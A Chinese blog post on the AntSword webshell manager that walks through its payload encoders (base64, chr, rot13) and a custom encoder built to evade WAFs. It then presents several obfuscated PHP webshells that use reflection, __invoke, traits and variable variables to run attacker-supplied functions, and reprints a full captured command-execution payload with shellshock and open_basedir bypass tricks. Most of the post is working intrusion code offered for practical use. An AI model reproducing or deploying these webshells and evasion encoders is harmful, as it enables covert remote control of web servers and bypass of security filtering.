当前位置:网站首页>蚁剑webshell动态加密连接分析与实践
蚁剑webshell动态加密连接分析与实践
2022-08-05 09:22:00 【wespten】
一、蚁剑编码器
蚁剑采用了Electron打包作为外壳,ES6 ,dhtmlx,Nodejs 作为前端代码编写语言,搭配Babel&&Webpack进行组件化构建编译,外加iconv- lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块,从2.0版本开始,引入了加载器这一概念。
用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑/执行/调试等操作。可直接运行当前最新的开发版和发行版源代码。
模块介绍
在蚁剑自带的编码器中,存在base64、chr、chr16、rot13四种编码器,此外,官方还提供了一些其他另类的编码器。
php base64编码器
/**
* 利用php的base64_decode进行编码处理
*/
‘use strict’;
module.exports = (pwd, data, ext = null) => {
// 生成一个随机变量名
let randomID;
if (ext.opts.otherConf[‘use-random-variable’] === 1) {
randomID = antSword.utils.RandomChoice(antSword[‘RANDOMWORDS’]);
} else {
randomID = `${antSword[‘utils’].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
data[randomID] = Buffer
.from(data[‘_’])
.toString(‘base64’);
data[pwd] = `@eval(@base64_decode($_POST[‘${randomID}’]));`;
delete data[‘_’];
return data;
}
}
php base64解码器
‘use strict’;
module.exports = {
/**
* @returns {string} asenc 将返回数据base64编码
*/
asoutput: () => {
return `function asenc($out){
return @base64_encode($out);
}
`.replace(/\n\s+/g, ”);
},
/**
* 解码 Buffer
* @param {Buffer} buff 要被解码的 Buffer
* @returns {Buffer} 解码后的 Buffer
*/
decode_buff: (buff) => {
return Buffer.from(buff.toString(), ‘base64’);
}
php chr编码器
/**
利用php的chr函数进行编码处理
*/
‘use strict’
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while (i < php.length) {
ret.push(php[i].charCodeAt());
i++;
}
return `@eVAl(cHr(${ret.join(‘).ChR(‘)}));`;
}
// 编码并去除多余数据
data[pwd] = encode(data._);
delete data._;
// 返回数据
return data;
}
php chr16编码器
/**
* 利用php的chr函数进行编码处理
*/
‘use strict’
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while (i < php.length) {
ret.push(php[i].charCodeAt().toString(16));
i++;
}
return `@eVAl(cHr(0x${ret.join(‘).ChR(0x’)}));`;
}
// 编码并去除多余数据
data[pwd] = encode(data._);
delete data._;
// 返回数据
return data;
}
php rot13编码器
/**
* 利用php的 rot13 进行编码处理
*/
‘use strict’;
module.exports = (pwd, data, ext = null) => {
const encode = (s) => {
//use a Regular Expression to Replace only the characters that are a-z or A-Z
return s.replace(/[a-zA-Z]/g, function (c) {
// Get the character code of the current character and add 13 to it If it is
// larger than z’s character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= “Z” ?
90 :
122) >= (c = c.charCodeAt(0) + 13) ?
c :
c – 26);
});
}
// 生成一个随机变量名
let randomID;
if (ext.opts.otherConf[‘use-random-variable’] === 1) {
randomID = antSword.utils.RandomChoice(antSword[‘RANDOMWORDS’]);
} else {
randomID = `${antSword[‘utils’].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
data[randomID] = encode(data[‘_’]);
data[pwd] = `@eval(@str_rot13($_POST[‘${randomID}’]));`;
delete data[‘_’];
return data;
}
‘use strict’;
const rot13encode = (s) => {
//use a Regular Expression to Replace only the characters that are a-z or A-Z
return s.replace(/[a-zA-Z]/g, function (c) {
// Get the character code of the current character and add 13 to it If it is
// larger than z’s character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= “Z” ?
90 :
122) >= (c = c.charCodeAt(0) + 13) ?
c :
c – 26);
});
};
module.exports = {
asoutput: (tag_s, tag_e) => {
return `function asenc($out){
return str_rot13($out);
}
`.replace(/\n\s+/g, ”);
},
decode_buff: (buff) => {
return Buffer.from(rot13encode(buff.toString()));
}
}
二、蚁剑自定义编码器
antSword的自定义编码器,打开蚁剑的系统设置就可以看到编码管理选项,这里选择新增一个编码器。
点击新增编码器,命名之后点击编辑,可以通过代码和注释看出编码器的作用,这些代码主要就是javascript node.js基础语法。
然后我们修改一下代码,随机字符串+传输数据base64 这样的结果是干扰一些waf进行模糊解码,这样是不可能被直接解密。
/**
* php::base64编码器
* Create at: 2022/03/28 10:32:13
*/
‘use strict’;
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码随机字符串+传输数据base64
//生成13位随机字符串
let randomID = `${Math.random().toString(16).substr(2)}`;
console.log(“aaaaaaaaa”)
console.log(“a:”+Math.random())
console.log(“aaaaaaaaa”)
//0.6777933515637071
//Math.random()输出0到1(包括0,不包含1)的随机数。toString(16)将随机数转换为16进制的字符串。substr(2)截取字符串,因为随机数大于等于0小于1,前两位是“0.”,substring(2)从第三位开始截取到最后。
console.log(“AAAAAAAAAAAAAAAAAAAAAAAA”)
console.log(“randomID:”+randomID)
console.log(“AAAAAAAAAAAAAAAAAAAAAAAA”)
// 传输数据base64
let encry= new Buffer(data[‘_’]).toString(‘base64’);
console.log(“BBBBBBBBBBBBBBBBBBBBBBBBBBB”)
console.log(“encry:”+encry)
console.log(“BBBBBBBBBBBBBBBBBBBBBBBBBBB”)
//随机字符串+传输数据base64
data[pwd] = `${randomID}`+encry;
console.log(“CCCCCCCCCCCCCCCCCCCCCCCC”)
console.log(” data[pwd]:”+ data[pwd])
console.log(“CCCCCCCCCCCCCCCCCCCCCCCC”)
// 删除 _ 原有的payload
delete data[‘_’];
// 返回编码器处理后的 payload 数组
return data;
// 生成一个随机变量名
//let randomID = `_0x${Math.random().toString(16).substr(2)}`;
// 原有的 payload 在 data[‘_’]中
// 取出来之后,转为 base64 编码并放入 randomID key 下
//data[randomID] = Buffer.from(data[‘_’]).toString(‘base64’);
// shell 在接收到 payload 后,先处理 pwd 参数下的内容,
//data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
// ########## 请在上方编写你自己的代码 ###################
// 删除 _ 原有的payload
//delete data[‘_’];
// 返回编码器处理后的 payload 数组
// return data;
}
备注:
Math.random()输出0到1(包括0,不包含1)的随机数。
toString(16)将随机数转换为16进制的字符串。
substr(2)截取字符串,因为随机数大于等于0小于1,前两位是“0.”,substring(2)从第三位开始截取到最后。
弄好蚁剑端的加密,还需要设置文件木马的格式,配合蚁剑,此时上传的木马应该是这种格式,先写一个demo:
<?php
$a = base64_decode(substr($_POST[‘cmd’],13));
@eval($a);
?>
然后我们设置下AntantSword的代理设置为http,burp监听端口查看下结果。
配置好shell,然后连接shell,再查看burp的流量,设置使用form表单的方式发包,也可以使用multipart方式发包。
我们看一下流量上的效果图:
通过在js中打印在页面中输出和burp上看到http的流量数据。
三、蚁剑webshell动态加密连接
如果我们直接传参进行命令执行的话会很容易被WAF拦截。蚁剑有编码器这一功能可以方便我们绕过WAF的检测。在一次使用webshell过程中发现其并不能连接蚁剑,决定抓包简单分析一下流量修改我们的webshell。
ReflectionClass::newInstance
<?php
class Test1
{
public function __construct($para, $_value)
{
$para($_value);
}
}
$class1 = new ReflectionClass("Test1");
foreach (array('_POST') as $_r1) {
foreach ($$_r1 as $_asadasd=>$_wfwefb) {
$$_asadasd =$_wfwefb;
}
}
$class2 = $class1->newInstance($_asadasd, $$_asadasd);
们首先初始化一个反射类,传入要实例化类的类名,接下来用newInstance()方法对该类进行实例化。
我们的webshell需要接收两个参数,一个是函数,另一个是函数的参数,污点传递理论:
1. 接下来就是在构造函数内部执行命令,执行命令的方式是使用可变函数。当函数名被传入$para=assert时,构造函数内变为assert($_value)。函数的参数即我们要执行的命令。
2. 最后解决参数的传递。常见的$_GET[]、$_POST[]、$_COOKIE[]...数组无法直接使用。我们依然利用PHP的动态特性,使webshell不出现$_GET[]、$_POST[]、$_COOKIE[]...。当程序执行到第二个foreach循环之前。我们的输入并没有参数来接收,直到我们使用可变变量变出了$_POST[],并将其键值进一步操作后传入newInstance函数。
上面这个webshell依然可以进行变形:
<?php
class Test1
{
private $para1 = '';
private $para2 = '';
public function __invoke($para1, $para2)
{
$para1($para2);
}
public function __construct($para1, $para2)
{
$this($para1, $para2);
}
}
$class1 = new ReflectionClass("Test1");
foreach (array('_POST') as $_r1) {
foreach ($$_r1 as $_asadasd=>$_wfwefb) {
$$_asadasd =$_wfwefb;
}
}
$class2 = $class1->newInstance($_asadasd, $$_asadasd);
__invoke:当尝试以调用函数的方式调用一个对象时,该方法会被自动调用。
所以我们在构造函数内调用一次对象:$this($p1,$p2),接着会调用__invoke()函数实现命令执行。
trait(PHP 7)
php从以前到现在一直都是单继承的语言,无法同时从两个基类中继承属性和方法,为了解决这个问题,php出了Trait这个特性。
用法:通过在类中使用use关键字,声明要组合的Trait名称,具体的Trait的声明使用Trait关键词,Trait不能实例化。
<?php
trait Dog
{
public $name="dog";
public function drive()
{
echo "This is dog drive";
}
public function eat($a, $b)
{
$a($b);
}
}
class Animal
{
public function drive()
{
echo "This is animal drive";
}
public function eat()
{
echo "This is animal eat";
}
}
class Cat extends Animal
{
use Dog;
public function drive()
{
echo "This is cat drive";
}
}
foreach (array('_POST') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$cat = new Cat();
$cat->eat($_key, $_value);
- 我们的参数依旧将键值数组中的
键
、值
分别传入。函数调用则使用PHP 7中的trait
特性,最终实现可变函数的执行
静态调用非静态函数
<?php
class SimpleThis
{
public function NonStatic($p1, $p2)
{
if (isset($this)) {
echo '6';
} else {
$p1($p2);
}
}
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
SimpleThis::NonStatic($_key, $_value);
在C、Java中,非静态函数肯定是不能被静态调用的。首先会编译失败。但是PHP是个解释函数。至于原理:这里直接附上鸟哥的文章
连接蚁剑
将蚁剑挂上burpsuite。上传我们的一句话木马进行连接。
- 请求的流量
[email protected](@str_rot13($_POST[ca3a283bf3d534]));&[email protected]_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea $bhg;};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "ron28298";rpub @nfrap($bhgchg);rpub "9741440r5";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q} ";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.=" ";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))[email protected]_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.=" {$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();
- 可以得到webshell执行的内容为:
assert(@eval(@str_rot13($_POST[ca3a283bf3d534]));)
,接着&ca3a283bf3d534=xxxx
为我们的第二个POST参数
所以实际上webshell执行的是第二个随机参数的值。 - 回显
Call to undefined function ca3a283bf3d534()这里报错未定义的函数,很显然我们的可变函数的函数名被覆盖了。并没有执行assert(),达到预期的结果。
实际上我们需要的是第一个POST参数即我们传入的assert。所以我们的webshell在循环数组时,造成了变量覆盖,后来的参数覆盖了前一个值。在webshell中我们需要取第一个值再传递它即可。
修改
以第一个webshell为例:
<?php
$s0;
$s1;
class Test1
{
public function __construct($para, $_value)
{
$para($_value);
}
}
$class1 = new ReflectionClass("Test1");
print_r($class1);
foreach (array('_POST') as $_request) {
foreach ($$_request as $_key=>$_value) {
for ($i=0;$i<1;$i++) {
${"s".$i} = $_key;
}
break;
}
}
$class2 = $class1->newInstance($s0, $_value);
我们依然使用可变变量的方式获取参数的值。我们循环一次将函数名取出,再传递即可。
最后
success!
四、蚁剑加密流量分析
已经解决了初步认证的问题。
经分析,通过连通密钥首即可通过蚁剑的认证,达到连接成功的目的,但是连接成功后会出现这种情况。
所以我进行初步猜测,虚拟终端初始化没有问题,执行命令出现问题,所以我最开始的分析就先从执行命令功能开始进行。
流量分析
首先我们抓一个虚拟终端的执行命令请求包进行初步的分析,之后我们将数据流进行URL解码。
PS:为了大家方便查看,我将请求格式化后贴在了下面。
f72002fb14c8e8 = SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3 & lefdf77c8e3d95 = yBY21k & pota123 = @ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$tmdir = ".5062e111e";@
mkdir($tmdir);@
chdir($tmdir);@
ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {@
chdir("..");
}@
ini_set("open_basedir", "/");@
rmdir($ocwd.
"/".$tmdir);
};
function asenc($out) {
return $out;
};
function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "6d29".
"1125";
[email protected] asenc($output);
echo "699".
"aa2b";
}
ob_start();
try {
$p = base64_decode(substr($_POST["lefdf77c8e3d95"], 2));
$s = base64_decode(substr($_POST["f72002fb14c8e8"], 2));
$envstr = @base64_decode(substr($_POST["w641c9ee55f10c"], 2));
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
if (substr($d, 0, 1) == "/") {@
putenv("PATH=".getenv("PATH").
":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {@
putenv("PATH=".getenv("PATH").
";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
} if (!empty($envstr)) {
$envarr = explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {@
putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r = "{$p} {$c}";
function fe($f) {
$d = explode(",", @ini_get("disable_functions"));
if (empty($d)) {
$d = array();
} else {
$d = array_map('trim', array_map('strtolower', $d));
}
return (function_exists($f) && is_callable($f) && !in_array($f, $d));
};
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("[email protected]", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);@
unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};
function runcmd($c) {
$ret = 0;
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
if (fe('system')) {@
system($c, $ret);
}
elseif(fe('passthru')) {@
passthru($c, $ret);
}
elseif(fe('shell_exec')) {
print(@shell_exec($c));
}
elseif(fe('exec')) {@
exec($c, $o, $ret);
print(join("
", $o));
}
elseif(fe('popen')) {
$fp = @popen($c, 'r');
while ([email protected]($fp)) {
print(@fgets($fp, 2048));
}@
pclose($fp);
}
elseif(fe('proc_open')) {
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while ([email protected]($io[1])) {
print(@fgets($io[1], 2048));
}
while ([email protected]($io[2])) {
print(@fgets($io[2], 2048));
}@
fclose($io[1]);@
fclose($io[2]);@
proc_close($p);
}
elseif(fe('antsystem')) {@
antsystem($c);
}
elseif(runshellshock($d, $c)) {
return $ret;
}
elseif(substr($d, 0, 1) != "/" && @class_exists("COM")) {
$w = new COM('WScript.shell');
$e = $w - > exec($c);
$so = $e - > StdOut();
$ret. = $so - > ReadAll();
$se = $e - > StdErr();
$ret. = $se - > ReadAll();
print($ret);
} else {
$ret = 127;
}
return $ret;
};
$ret = @runcmd($r.
" 2>&1");
print($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
echo "ERROR://".$e - > getMessage();
};
asoutput();
die(); & w641c9ee55f10c = Ut
通过数据包的请求和响应我们取出最关键的两处。
过初步分析我们得知一个信息,请求内容的核心代码位置存在关键的变量引用,这点开始引起了我的重视。(最后分析过全部功能后,把这块弄明白可以解决全部功能的问题)
PS:执行命令流量包的特征我就不写了,可以自行去分析流量包寻找特征。
代码分析
通过流量分析我们得到了一处变量串,并且得知解码方式,我们写个函数先给内容解密一下看看。
f72002fb14c8e8=SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3&lefdf77c8e3d95=yBY21k&[email protected]_set("display_errors", "0")
我们解密后得知变量的内容为到这里,我们已经获取了执行命令的唯一特征。(PS:这里我们可以直接通过对base64编码的方式来确定命令内容,具体细节就不多说了懂的都懂。)
cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87
我们现在已经可以确定命令特征了,通过流量分析得到的特征,稍作修改我们就可以实现虚拟终端的全部功能了。但是我们还有一个关键问题没有解决,”返回连接那里执行命令返回一次内容后,路径发生变化导致后续命令执行失败“。
整合分析
这块其实卡了很久,一直想为什么,按理来说,认证通过了命令也能成功解析应该是不会出现这个问题才对的,难道说请求包里有内容在控制路径?或者说这块的信息是当前路径?带着这种思路我打开了蚁剑的源码开始分析。
终于我找到了命令执行这块的核心代码,如下图。
我们可以看到这个就是我们代码分析处得到命令执行内容。我们关联一下两者之间的关系。
`cd "${path}";${cmd};echo [S];(pwd).path;echo [E]` :
`cd /d "${path}"&${cmd}&echo [S]&cd&echo [E]` :
`cd "${path}";${cmd};echo [S];pwd;echo [E]`);
cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87
我们很容易就可以看出来 8b226e44 9db7f88c87就是对应的[S] [E],可是[S][E]是什么东西呢,难道是认证么,我们回过头来去分析流量包。
OK,问题解决了,也就是说我们接受到数据后,只返回了第一步认证(这里我叫做连通性密钥),而我们没有通过第二步认证([S]当前路径[E]),所以我们的蚁剑就只获取到了win-raf7i2l9ph1\potato这一个有效数据,自然而然在当前路径处渲染了win-raf7i2l9ph1\potato的内容了。所以我们命令执行只需要构造这样一个请求包。
实现效果
最后只需要编写对应的脚本,这里我提醒一下大家,执行命令的数据包有两种特征。
边栏推荐
猜你喜欢
随机推荐
Thinking and summary of the efficiency of IT R&D/development process specification
HStreamDB Newsletter 2022-07|分区模型优化、数据集成框架进一步完善
leetcode points to Offer 10- I. Fibonacci sequence
hcip BGP 增强实验
IO流篇 -- 基于io流实现文件夹拷贝(拷贝子文件夹及子文件夹内文件)满满的干货
(转)[Json]net.sf.json 和org.json 的差别及用法
汇编语言(8)x86内联汇编
Voice conversion相关语音数据集综合汇总
Neuron Newsletter 2022-07|新增非 A11 驱动、即将支持 OPC DA
在colab里怎样读取google drive数据
轩辕实验室丨欧盟EVITA项目预研 第一章(四)
MQTT X Newsletter 2022-07 | 自动更新、MQTT X CLI 支持 MQTT 5.0、新增 conn 命令…
链表中的数字相加----链表专题
这样写有问题吗?怎么在sql-client 是可以做到数据的同步的
明天去订票,准备回家咯~~
tensorflow.keras无法引入layers
动态内存开辟(C语言)
leetcode 剑指 Offer 10- I. 斐波那契数列
使用稀疏 4D 卷积对 3D LiDAR 数据中的运动对象进行后退分割(IROS 2022)
上海控安技术成果入选市经信委《2021年上海市网络安全产业创新攻关成果目录》